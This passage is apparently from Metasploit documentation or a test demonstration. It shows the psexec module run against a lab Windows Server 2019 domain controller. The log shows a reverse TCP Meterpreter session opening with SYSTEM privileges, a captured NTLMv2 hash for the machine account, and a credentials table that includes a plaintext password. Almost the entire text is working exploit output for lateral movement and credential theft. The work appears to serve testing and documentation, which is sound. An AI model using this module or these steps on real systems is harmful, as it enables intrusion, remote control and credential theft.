   EXITFUNC        thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_FILENAME  test.dll         yes       Payload file name to fetch; cannot contain spaces or slashes.
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|MSFLAB as user 'smcintyre'...
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\DC$
[SMB] NTLMv2-SSP Hash       : DC$::MSFLAB:c52f55b1c7ea13fc:6758481c7293714ec6fa7b5329d94772:010100000000000080ee72c0423fda01258542d9453e8ac100000000020016004c004f00430041004c0044004f004d00410049004e00010012004c004f00430041004c0048004f0053005400040016004c004f00430041004c0044004f004d00410049004e00030012004c004f00430041004c0048004f00530054000700080080ee72c0423fda01060004000200000008003000300000000000000000000000004000006ae305e3d89634a2752974208e2137b802c0d05ed3b0903ddf218eb255efb5d70a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[*] Sending stage (200774 bytes) to 192.168.159.10
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:59620) at 2024-01-04 14:18:10 -0500
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\eAIbYnrgOszJRlP.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 13
Meterpreter     : x64/windows
meterpreter > background 
[*] Backgrounding session 2...
cmsf6 exploit(windows/smb/psexec) > creds
Credentials
===========

host            origin          service        public     private                                                                                              realm   private_type        JtR Format  cracked_password
----            ------          -------        ------     -------                                                                                              -----   ------------        ----------  ----------------
192.168.159.10  192.168.159.10  445/tcp (smb)  smcintyre  Password1!                                                                                           MSFLAB  Password                        
192.168.159.10  192.168.159.10  445/tcp (smb)  DC$        DC$::MSFLAB:c52f55b1c7ea13fc:6758481c7293714ec6fa7b5329d94772:010100000000000080ee72c04 (TRUNCATED)  MSFLAB  Nonreplayable hash  netntlmv2   

msf6 exploit(windows/smb/psexec) >
```